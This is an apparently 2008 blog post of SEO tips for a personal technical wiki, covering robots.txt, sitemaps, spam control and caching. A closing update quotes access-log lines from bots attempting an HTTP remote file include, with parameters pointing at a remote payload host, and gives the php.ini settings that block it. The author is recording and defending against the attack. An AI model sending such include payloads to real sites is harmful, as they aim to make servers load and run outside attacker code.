Top 10 ways to increase traffic to your wiki
On my wiki I journal various tips, usually technical in nature. Often I write a small piece of code or figure out the solution to a strange error message, and I like to post it to my wiki. Most search engine optimization articles relate to general websites or blogs. Wikis generally do not have a regular readership; people come across them through search engines or direct links. Most SEO tips are about creating stickiness and brands. What I want is different: people who find my wiki should find the information they were looking for and leave.
Why do I post to my own wiki instead of to [x]? Over the years I've published various helpful guides and answers. For a while I was posting to a well-known site which lets 'experts' publish answers to questions. The initial business model was that corporate users would pay for 'expert' credit. Unfortunately, the site turned into the web's biggest SEO link farm. Often when I search for solutions to computer problems, this site shows up as the number one page in Google. I've gone so far as to install a Greasemonkey script to remove these links. The other obvious place to post these sorts of answers is newsgroups. Well, many of the things I've figured out don't have a pre-existing question. I figure if I write the answer, people with the question will find it.
So, I've taken to creating a wiki with all sorts of information which I find useful. Where I have relevant information, I want people to be able to find it. Here are some tips to make your wiki more accessible to search engines.
- content, content, content
- The most important thing, of course, is having good content. It's often hard to tell what 'good' content is when you write it, but after you put it up it's easy to see what becomes popular. I recommend posting a lot, and improving the articles which become popular. When I posted Java Unique List, I didn't expect it to become the most popular page on my wiki. A number of other articles, such as log4j file rotation, have risen to the number one spot on a Google search for the term.
- robots.txt
- Every site should have a robots.txt file. This file serves to keep robots out of areas where they don't need to be, and point them to the areas they should be indexing. A robot does not need to index page histories, or click on edit links. I disallow these, and this removes some of the 'noise' from the search engine. If Google indexes your history, it may have both in its results, and your 'Google juice' will be split between the current page and a history page. Secondly, the robots.txt file lists my sitemaps.
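As a sketch, a robots.txt along these lines keeps crawlers out of the non-content URLs and advertises the sitemap. The paths here are illustrative: with MediaWiki's usual "short URL" layout, article pages live under /wiki/ while edit forms, histories, and diffs all go through /w/index.php, so one rule covers them. Adjust to your own install.

```
User-agent: *
# Edit links, page histories, and special pages all go through
# /w/index.php in a short-URL MediaWiki setup, so blocking /w/
# keeps robots on the actual articles. (Path is illustrative.)
Disallow: /w/

# Point robots at the sitemap
Sitemap: http://www.example.com/sitemap-index.xml
```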
- site maps
- Most wiki software can create a sitemap. This is important, as it lets robots know exactly what has changed on your website, and what priority to index things in. This keeps the robots from indexing the same pages all the time, and helps them find pages which might not be linked to. I'm not sure how to set up a ping to get Google to index a page the way a blog does, but it seems to hit my sitemap fairly frequently.
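For reference, a sitemap is just an XML file of URLs with change-frequency and priority hints; MediaWiki can generate one with its maintenance/generateSitemap.php script. An entry looks roughly like this (the URL and values are illustrative):

```
<?xml version="1.0" encoding="UTF-8"?>
<urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
  <url>
    <loc>http://www.example.com/wiki/Some_Article</loc>
    <!-- lastmod lets robots skip pages that haven't changed -->
    <lastmod>2008-09-16</lastmod>
    <changefreq>weekly</changefreq>
    <!-- priority is relative importance within your own site -->
    <priority>0.8</priority>
  </url>
</urlset>
```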
- Wikipedia
- Wikipedia has a specific policy against original research on its site. If you've written original research, you may want to put the content on your own site, and include a reference to it on Wikipedia. For example, I receive a lot of links from Wikipedia to my Java implementation of a CUSIP check. I don't think Wikipedia needs to have code samples in every language on its site, but many people find the link to the Java or C code useful. I'm opposed to adding non-relevant external links on Wikipedia, and I actively try to remove them.
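The CUSIP check mentioned above is a simple modulus-10 "double-add-double" calculation over the first eight characters. A minimal sketch (my own illustration here, not necessarily the exact code linked from Wikipedia) looks like this:

```java
public class CusipCheck {
    // Computes the check digit (0-9) from the first 8 characters of a CUSIP.
    public static int checkDigit(String cusip) {
        int sum = 0;
        for (int i = 0; i < 8; i++) {
            char c = cusip.charAt(i);
            int v;
            if (Character.isDigit(c))       v = c - '0';
            else if (Character.isLetter(c)) v = Character.toUpperCase(c) - 'A' + 10;
            else if (c == '*')              v = 36;
            else if (c == '@')              v = 37;
            else if (c == '#')              v = 38;
            else throw new IllegalArgumentException("invalid character: " + c);
            if (i % 2 == 1) v *= 2;   // double every second position
            sum += v / 10 + v % 10;   // add the digits of the (possibly doubled) value
        }
        return (10 - (sum % 10)) % 10;
    }

    // A 9-character CUSIP is valid if its last digit matches the computed check digit.
    public static boolean isValid(String cusip) {
        return cusip.length() == 9
            && Character.isDigit(cusip.charAt(8))
            && checkDigit(cusip) == cusip.charAt(8) - '0';
    }
}
```

For example, Apple's CUSIP 037833100 validates: the weighted digit sum of the first eight characters is 30, giving a check digit of 0.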
- Google Webmaster Tools
- This is a great service provided by Google which lets you monitor your crawl stats and query search terms. You can see if non-relevant parts of your website are being indexed, and what search terms people type in to find your site.
- This is a great, free tool, and many hosting providers have it already set up. You should look at the query search terms, as well as any errors. Additionally, it makes sense to look for abnormal traffic. This is often the only clue that your site is being covertly spammed. For a while my Magpie RSS reader tool was being used by spammers to make it appear that their content was a part of my site.
- The long tail
- I know my writings serve only a small niche. If you have a wiki, don't try to compete with Wikipedia; rather, write about specifics which you know a good deal about. One of my more popular wiki pages is, and has been, GPS Meets Google Maps. I wrote this when Google Maps first came out, and many people since then have wanted to view their runs on a Google map. There probably aren't a whole lot of people who own a Forerunner 201 and also want to put the data onto a Google map, but those who do often come across my article. Most of the time you have no idea what will become popular, so write about unique things, and you'll find a niche audience.
- keep spam free
- Make sure that spammers aren't polluting your site. Once spammers start to get links onto your site, your page rank will go down. You should update your wiki software at least once a year; old software often contains security holes which let spammers write scripts to edit your site directly. A few times when I ran phpWiki, my entire site was replaced by a spammer. One thing to do is to subscribe to all edits on your site, but even with this, if there is a security hole, you won't get notifications of the changes. MediaWiki has been quite good in regards to security and updates. If there weren't active development of MediaWiki, I'd probably have to switch to something else. Many of my pages rank #1 on Google with the right set of search terms, and even with CAPTCHAs, spammers will find it worth their time to attack these sorts of pages.
- have a quality web host with good availability
- I've switched to using Slicehost, and have seen a huge reduction in Google crawl errors. I don't have enough traffic to start worrying a lot about caching or high scalability, but I do try to check my pages with YSlow from time to time. If you're hosting your own site, you can set up Squid caches so most traffic doesn't have to involve database calls and large amounts of PHP. This is how Wikipedia is able to scale. When huge volumes of people hit a dynamic page, you either have to have lots of servers, or effective caching of the content which isn't changing. Making sure you're setting appropriate caching headers on static content can speed up your site quite a bit, and reduce your server load as well.
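As a sketch, with Apache's mod_expires the caching headers on static content can be set in a few lines (the expiry times here are illustrative; pick what suits how often your assets change):

```
# Apache httpd configuration, assuming mod_expires is loaded
<IfModule mod_expires.c>
    ExpiresActive On
    # Static assets rarely change; let browsers and proxies
    # cache them for a month instead of re-fetching every visit.
    ExpiresByType image/png   "access plus 1 month"
    ExpiresByType image/jpeg  "access plus 1 month"
    ExpiresByType text/css    "access plus 1 month"
</IfModule>
```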
- It's not what it used to be, and unfortunately, is a far cry from what it could be, but it's still an important directory to be a part of. Make sure your site is listed once (and only once) in the directory.
Things I'm not so sure about
- It makes sense to have things spelled correctly, but misspelling is a common SEO tactic. Misspelling certain words will give you ranking for the misspellings, but may not give you traffic. For example, as of this writing, I have the top page for curoisity. When I noticed this, I fixed the spelling on the page, and left a note regarding the original misspelling. We know people misspell and mistype all the time, but I think it looks really bad to have misspellings on your site.
- Social bookmarks
- I'm experimenting with adding social bookmarks on my site.
- Create a top 10 list
- People seem to like to link to these sorts of articles. We'll see if this page becomes one of my top 10 wiki pages.
September 16, 2008 Update - Page has risen to become a favorite for spam robots
Looks like spammers have found this page, and are trying the old [HTTP Remote File Include] attack. As far as I can tell, it's not working, as I have both register_globals and allow_url_include [turned off].
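For reference, these are the two php.ini settings in question; both should be off (allow_url_include exists as of PHP 5.2, and register_globals has defaulted to off since PHP 4.2):

```
; php.ini - disable the features remote file include attacks rely on
register_globals = Off   ; don't turn request parameters into PHP variables
allow_url_include = Off  ; don't allow include()/require() of remote URLs
```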
184.108.40.206 - - [13/Sep/2008:12:44:38 +0000] "GET /wikimedia/index.php/Top_10...ease_traffic_to_your_wiki/errors.php?error=http://example.com/components/com_zoom/images/pbot.txt? HTTP/1.1" 200 9936 "-" "libwww-perl/5.805"
220.127.116.11 - - [13/Sep/2008:13:14:59 +0000] "GET /wikimedia/index.php/Top_10...ease_traffic_to_your_wiki/errors.php?error=http://example.com/sdsdf.gif????? HTTP/1.1" 200 9912 "-" "libwww-perl/5.805"
grep Top_10_ways_to_increase_traffic_to_your_wiki *.log | grep -Eo 'http://[^/]+' | grep -v eggeadventure | sort | uniq -c | sort -rn
    161 http://help.yahoo.com
    124 http://www.webalta.net
    107 http://www.reddit.com
     61 http://www.google.com
     46 http://www.yanga.co.uk
     38 http://search.msn.com
     24 http://www.majestic12.co.uk